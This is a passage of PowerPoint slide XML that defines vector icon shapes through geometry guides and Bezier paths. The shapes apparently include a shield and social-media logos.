                <a:gd name="connsiteX24" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY32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2397082 w 3890413"/>
                <a:gd name="connsiteY11" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY31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0413" h="3948462">
                  <a:moveTo>
                    <a:pt x="1853384" y="1371624"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1768767" y="1390324"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1579409" y="1463487"/>
                    <a:pt x="1490873" y="1833773"/>
                    <a:pt x="1517577" y="2042010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1544281" y="2250247"/>
                    <a:pt x="1644086" y="2624290"/>
                    <a:pt x="1928990" y="2639747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177093" y="2653207"/>
                    <a:pt x="2337423" y="2363017"/>
                    <a:pt x="2318674" y="2006358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310210" y="1948950"/>
                    <a:pt x="2301678" y="1891436"/>
                    <a:pt x="2293344" y="1834228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2229725" y="1555945"/>
                    <a:pt x="2050691" y="1359067"/>
                    <a:pt x="1853384" y="1371624"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1594841" y="45653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2527821" y="-128041"/>
                    <a:pt x="3626282" y="158796"/>
                    <a:pt x="3869632" y="1517323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3939308" y="2058696"/>
                    <a:pt x="3820785" y="2251376"/>
                    <a:pt x="3706266" y="2457195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3132098" y="3124925"/>
                    <a:pt x="2589274" y="2611359"/>
                    <a:pt x="2548384" y="2446988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411721" y="3024903"/>
                    <a:pt x="2005702" y="3164775"/>
                    <a:pt x="1746058" y="3093574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486414" y="3022373"/>
                    <a:pt x="990519" y="2612821"/>
                    <a:pt x="990519" y="2019783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="990519" y="1500875"/>
                    <a:pt x="1249504" y="1067935"/>
                    <a:pt x="1593790" y="967808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1642974" y="953504"/>
                    <a:pt x="1694009" y="949376"/>
                    <a:pt x="1746058" y="945992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004670" y="929176"/>
                    <a:pt x="2081338" y="1030119"/>
                    <a:pt x="2206475" y="1173924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194343" y="1061758"/>
                    <a:pt x="2187003" y="961165"/>
                    <a:pt x="2185910" y="877882"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2656644" y="803138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2828567" y="2099525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2888366" y="2544108"/>
                    <a:pt x="3261961" y="2420799"/>
                    <a:pt x="3362812" y="2002360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3355320" y="1625023"/>
                    <a:pt x="3366534" y="1729632"/>
                    <a:pt x="3289926" y="1346695"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3290031" y="1346798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3068547" y="637774"/>
                    <a:pt x="2419129" y="439933"/>
                    <a:pt x="1700745" y="575031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890947" y="727320"/>
                    <a:pt x="415476" y="1491783"/>
                    <a:pt x="571995" y="2274165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="728513" y="3056546"/>
                    <a:pt x="1580131" y="3572543"/>
                    <a:pt x="2267548" y="3408286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2796517" y="3281890"/>
                    <a:pt x="2641988" y="3320887"/>
                    <a:pt x="3194376" y="3072653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3249441" y="3306078"/>
                    <a:pt x="3239115" y="3309742"/>
                    <a:pt x="3268026" y="3509545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3021841" y="3717756"/>
                    <a:pt x="2685602" y="3836362"/>
                    <a:pt x="2347298" y="3904041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1157336" y="4112956"/>
                    <a:pt x="289475" y="3581660"/>
                    <a:pt x="42617" y="2380068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-204242" y="1178477"/>
                    <a:pt x="661862" y="219348"/>
                    <a:pt x="1594841" y="456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14E2E14-9B57-4A66-85E1-221EAEE17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6880" y="2771935"/>
              <a:ext cx="315652" cy="359610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3456727" h="3938119">
                  <a:moveTo>
                    <a:pt x="1728364" y="1961325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1726089" y="2407152"/>
                    <a:pt x="1737463" y="2812034"/>
                    <a:pt x="1735188" y="3257861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2394830" y="3057694"/>
                    <a:pt x="2610919" y="2352560"/>
                    <a:pt x="2765594" y="1981796"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1728362" y="682044"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1355324" y="868563"/>
                    <a:pt x="1166530" y="952725"/>
                    <a:pt x="609247" y="1002767"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="606972" y="1330312"/>
                    <a:pt x="631992" y="1623739"/>
                    <a:pt x="704780" y="1964933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="1971757"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1728363" y="1541853"/>
                    <a:pt x="1728362" y="1111948"/>
                    <a:pt x="1728362" y="682044"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1723409" y="487996"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1725062" y="488690"/>
                    <a:pt x="1726712" y="489384"/>
                    <a:pt x="1728363" y="490064"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730015" y="489384"/>
                    <a:pt x="1731666" y="488690"/>
                    <a:pt x="1733319" y="487996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="492131"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2179467" y="679460"/>
                    <a:pt x="2405896" y="769409"/>
                    <a:pt x="2817789" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2971516" y="823489"/>
                    <a:pt x="3036247" y="875307"/>
                    <a:pt x="3033236" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3015439" y="2441328"/>
                    <a:pt x="2363638" y="3359629"/>
                    <a:pt x="1733319" y="3448048"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3449086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3448048"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1093089" y="3359629"/>
                    <a:pt x="441289" y="2441328"/>
                    <a:pt x="423491" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420479" y="875307"/>
                    <a:pt x="485211" y="823489"/>
                    <a:pt x="638937" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050832" y="769409"/>
                    <a:pt x="1277261" y="679460"/>
                    <a:pt x="1723409" y="492131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1722802" y="306889"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="311530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1222099" y="521767"/>
                    <a:pt x="967982" y="622713"/>
                    <a:pt x="505720" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333196" y="683408"/>
                    <a:pt x="260550" y="741561"/>
                    <a:pt x="263929" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283902" y="2499079"/>
                    <a:pt x="1015407" y="3529669"/>
                    <a:pt x="1722802" y="3628902"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728365" y="3630065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3628902"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2441322" y="3529669"/>
                    <a:pt x="3172826" y="2499079"/>
                    <a:pt x="3192800" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3196179" y="741561"/>
                    <a:pt x="3123532" y="683408"/>
                    <a:pt x="2951007" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488747" y="622713"/>
                    <a:pt x="2234630" y="521767"/>
                    <a:pt x="1733925" y="311530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="306889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1732071" y="307669"/>
                    <a:pt x="1730218" y="308445"/>
                    <a:pt x="1728365" y="309209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1726510" y="308445"/>
                    <a:pt x="1724659" y="307669"/>
                    <a:pt x="1722802" y="306889"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1721800" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1723991" y="923"/>
                    <a:pt x="1726176" y="1844"/>
                    <a:pt x="1728363" y="2749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730551" y="1844"/>
                    <a:pt x="1732737" y="923"/>
                    <a:pt x="1734926" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="5497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2325825" y="254550"/>
                    <a:pt x="2625718" y="374136"/>
                    <a:pt x="3171248" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3374850" y="446035"/>
                    <a:pt x="3460584" y="514926"/>
                    <a:pt x="3456595" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3433024" y="2596936"/>
                    <a:pt x="2569749" y="3817807"/>
                    <a:pt x="1734926" y="3935360"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3936740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3935360"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="886977" y="3817807"/>
                    <a:pt x="23703" y="2596936"/>
                    <a:pt x="132" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3858" y="514926"/>
                    <a:pt x="81876" y="446035"/>
                    <a:pt x="285478" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831010" y="374136"/>
                    <a:pt x="1130903" y="254550"/>
                    <a:pt x="1721800" y="54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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6065040D-3594-4BAC-A8C1-673E9B9D9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5543" y="2519661"/>
              <a:ext cx="338578" cy="33854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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612BCB4-6800-4D3F-84A7-B411A2B0064A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2648398">
              <a:off x="8942310" y="2514803"/>
              <a:ext cx="148930" cy="380894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7806EA61-FF58-47E3-B6B3-7DE8F13A1EEA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8651645" y="4749636"/>
              <a:ext cx="318301" cy="317452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99B57F1-325B-4FFB-91E0-0B240A518703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8268788" y="3120081"/>
              <a:ext cx="291831" cy="251871"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 316007"/>
                <a:gd name="connsiteX1" fmla="*/ 306633 w 366142"/>
                <a:gd name="connsiteY1" fmla="*/ 31202 h 316007"/>
                <a:gd name="connsiteX2" fmla="*/ 349699 w 366142"/>
                <a:gd name="connsiteY2" fmla="*/ 10558 h 316007"/>
                <a:gd name="connsiteX3" fmla="*/ 325569 w 366142"/>
                <a:gd name="connsiteY3" fmla="*/ 59830 h 316007"/>
                <a:gd name="connsiteX4" fmla="*/ 366142 w 366142"/>
                <a:gd name="connsiteY4" fmla="*/ 52395 h 316007"/>
                <a:gd name="connsiteX5" fmla="*/ 334454 w 366142"/>
                <a:gd name="connsiteY5" fmla="*/ 94697 h 316007"/>
                <a:gd name="connsiteX6" fmla="*/ 316939 w 366142"/>
                <a:gd name="connsiteY6" fmla="*/ 174999 h 316007"/>
                <a:gd name="connsiteX7" fmla="*/ 184305 w 366142"/>
                <a:gd name="connsiteY7" fmla="*/ 311458 h 316007"/>
                <a:gd name="connsiteX8" fmla="*/ 27716 w 366142"/>
                <a:gd name="connsiteY8" fmla="*/ 295316 h 316007"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY9" fmla="*/ 281129 h 316007"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY10" fmla="*/ 268036 h 316007"/>
                <a:gd name="connsiteX11" fmla="*/ 23178 w 366142"/>
                <a:gd name="connsiteY11" fmla="*/ 266110 h 316007"/>
                <a:gd name="connsiteX12" fmla="*/ 108726 w 366142"/>
                <a:gd name="connsiteY12" fmla="*/ 240807 h 316007"/>
                <a:gd name="connsiteX13" fmla="*/ 20535 w 366142"/>
                <a:gd name="connsiteY13" fmla="*/ 200079 h 316007"/>
                <a:gd name="connsiteX14" fmla="*/ 70653 w 366142"/>
                <a:gd name="connsiteY14" fmla="*/ 194871 h 316007"/>
                <a:gd name="connsiteX15" fmla="*/ 20899 w 366142"/>
                <a:gd name="connsiteY15" fmla="*/ 168840 h 316007"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY16" fmla="*/ 146258 h 316007"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY17" fmla="*/ 116697 h 316007"/>
                <a:gd name="connsiteX18" fmla="*/ 14104 w 366142"/>
                <a:gd name="connsiteY18" fmla="*/ 121836 h 316007"/>
                <a:gd name="connsiteX19" fmla="*/ 40441 w 366142"/>
                <a:gd name="connsiteY19" fmla="*/ 126434 h 316007"/>
                <a:gd name="connsiteX20" fmla="*/ 20722 w 366142"/>
                <a:gd name="connsiteY20" fmla="*/ 8541 h 316007"/>
                <a:gd name="connsiteX21" fmla="*/ 168525 w 366142"/>
                <a:gd name="connsiteY21" fmla="*/ 104817 h 316007"/>
                <a:gd name="connsiteX22" fmla="*/ 165796 w 366142"/>
                <a:gd name="connsiteY22" fmla="*/ 68430 h 316007"/>
                <a:gd name="connsiteX23" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY23" fmla="*/ 0 h 3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142" h="316007">
                  <a:moveTo>
                    <a:pt x="241139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="265040" y="0"/>
                    <a:pt x="292051" y="14516"/>
                    <a:pt x="306633" y="31202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327151" y="29858"/>
                    <a:pt x="335397" y="19692"/>
                    <a:pt x="349699" y="10558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343170" y="29574"/>
                    <a:pt x="336047" y="54091"/>
                    <a:pt x="325569" y="59830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340338" y="61437"/>
                    <a:pt x="353079" y="55334"/>
                    <a:pt x="366142" y="52395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361514" y="66282"/>
                    <a:pt x="342655" y="74263"/>
                    <a:pt x="334454" y="94697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326254" y="115131"/>
                    <a:pt x="329982" y="126199"/>
                    <a:pt x="316939" y="174999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296102" y="242622"/>
                    <a:pt x="276174" y="279635"/>
                    <a:pt x="184305" y="311458"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152057" y="320905"/>
                    <a:pt x="83508" y="315693"/>
                    <a:pt x="27716" y="295316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="281129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="268036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23178" y="266110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63548" y="261698"/>
                    <a:pt x="90116" y="254801"/>
                    <a:pt x="108726" y="240807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87700" y="241375"/>
                    <a:pt x="35310" y="244403"/>
                    <a:pt x="20535" y="200079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37583" y="203299"/>
                    <a:pt x="59856" y="197334"/>
                    <a:pt x="70653" y="194871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57204" y="189662"/>
                    <a:pt x="37595" y="181773"/>
                    <a:pt x="20899" y="168840"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="146258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="116697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14104" y="121836"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23887" y="123910"/>
                    <a:pt x="33812" y="125203"/>
                    <a:pt x="40441" y="126434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9945" y="103325"/>
                    <a:pt x="-5039" y="60063"/>
                    <a:pt x="20722" y="8541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76047" y="73391"/>
                    <a:pt x="116697" y="97001"/>
                    <a:pt x="168525" y="104817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166649" y="98530"/>
                    <a:pt x="164888" y="89662"/>
                    <a:pt x="165796" y="68430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166838" y="44047"/>
                    <a:pt x="190944" y="0"/>
                    <a:pt x="241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CDE015-9AA0-4BE4-A6D9-52CC6CFD2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9375" y="4197069"/>
              <a:ext cx="172150" cy="348350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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432915 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455920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367184 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 6 h 455920"/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313271 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455355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0 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 140898 h 455920"/>
